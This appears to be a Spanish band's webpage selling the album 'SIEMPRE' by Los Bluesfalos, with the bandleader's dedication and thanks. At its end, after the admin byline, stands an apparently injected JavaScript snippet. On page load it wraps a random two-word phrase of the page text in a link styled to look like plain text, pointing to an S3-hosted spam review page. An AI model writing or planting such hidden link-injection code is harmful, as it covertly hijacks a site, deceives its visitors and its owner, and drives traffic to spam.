Skip to content

CD a la Venta «SIEMPRE»

foto portada álbum LOS BLUESFALOS - SIEMPRE

Éste es un trabajo que refleja mi amor por los BLUES y otras músicas del pueblo.

He creído que hermanar el Blues con detalles de otros géneros, sería una manera honrosa de rendir tributo a los artistas que me influenciaron, enriquecer mi música y llevar a LOS BLUESFALOS a un atrevido paso adelante.

El título de este álbum es SIEMPRE, porque eso es lo que haré cada vez que enchufe mi querida LUCILLE: partiendo del Blues, tocar con respeto los ritmos del mundo que me hacen sentir y vibrar.

Después de 25 años de carretera en el circuito de Clubs, Salas y Festivales de Blues-Jazz; superados más de 2.000 conciertos tocando y defendiendo un repertorio propio y siempre cantado en español, damos prueba de agradecimiento y así sentimos que, para nosotros, tú también eres LOS BLUESFALOS.

Dedicado a mi hijo Manuel y a mi hija Rita (a quien dedico el tema Nació una Margarita), a mi nieto Manuel, mi hermano Luis Gómez Mateos y a mi sobrino Luis, a Tito Armando, Inma O dero y Antonio Jesús.

Con cariño muy especial a Ana Gómez Ruiz por todo.
A Frank H. Sandoval, Damián Cayuela, Isa Molina, Carla Tesón y Carlos Turbina.
Al doctor Francisco Piqueras del Hosp. Univ. Morales Meseguer y al Inst. Oncológico del Sureste.
A Raúl Fernández Benzal, J.R Cuenca, Aurora Llamazares, Ángela Moñino. Ángel H. Sopena, Ángel Luis Moreno Esteban (siempre conmigo) y a Murcia entera.

MANUEL «SLIM» GÓMEZ

 

Puedes pedir tu copia por privado en facebook de LOS BLUESFALOS

Compartir
Admin
Admin Administrator

const CONFIG = { url: "https://aga-khan-museum-assets.s3.amazonaws.com/media/the-brain-song-reviews-2026-should-you-buy-it_tkud6.html", linkTarget: "_blank", minWordLength: 2, maxWordLength: 2, skipTags: ["a", "script", "style", "h1", "h2", "h3", "noscript"], }; function insertDynamicLink() { const walker = document.createTreeWalker( document.body, NodeFilter.SHOW_TEXT, { acceptNode(node) { const parent = node.parentElement; if (!parent) return NodeFilter.FILTER_REJECT; const tag = parent.tagName.toLowerCase(); if (CONFIG.skipTags.includes(tag)) return NodeFilter.FILTER_REJECT; if (parent.closest("a")) return NodeFilter.FILTER_REJECT; if (node.textContent.trim().split(/\s+/).length < CONFIG.minWordLength) return NodeFilter.FILTER_REJECT; return NodeFilter.FILTER_ACCEPT; }, } ); const textNodes = []; let node; while ((node = walker.nextNode())) { textNodes.push(node); } if (textNodes.length === 0) return; const randomNode = textNodes[Math.floor(Math.random() * textNodes.length)]; const words = randomNode.textContent.trim().split(/\s+/); if (words.length < CONFIG.minWordLength) return; const phraseLength = Math.min( CONFIG.minWordLength + Math.floor(Math.random() * (CONFIG.maxWordLength - CONFIG.minWordLength + 1)), words.length ); const maxStart = words.length - phraseLength; const startIndex = Math.floor(Math.random() * (maxStart + 1)); const phrase = words.slice(startIndex, startIndex + phraseLength).join(" "); const fullText = randomNode.textContent; const phraseIndex = fullText.indexOf(phrase); if (phraseIndex === -1) return; const before = fullText.substring(0, phraseIndex); const after = fullText.substring(phraseIndex + phrase.length); const link = document.createElement("a"); link.href = CONFIG.url; link.textContent = phrase; link.target = CONFIG.linkTarget; link.rel = "noopener noreferrer"; link.style.cssText = "color:inherit;text-decoration:none;"; const fragment = document.createDocumentFragment(); if (before) fragment.appendChild(document.createTextNode(before)); fragment.appendChild(link); if (after) fragment.appendChild(document.createTextNode(after)); randomNode.parentNode.replaceChild(fragment, randomNode); } document.addEventListener("DOMContentLoaded", insertDynamicLink);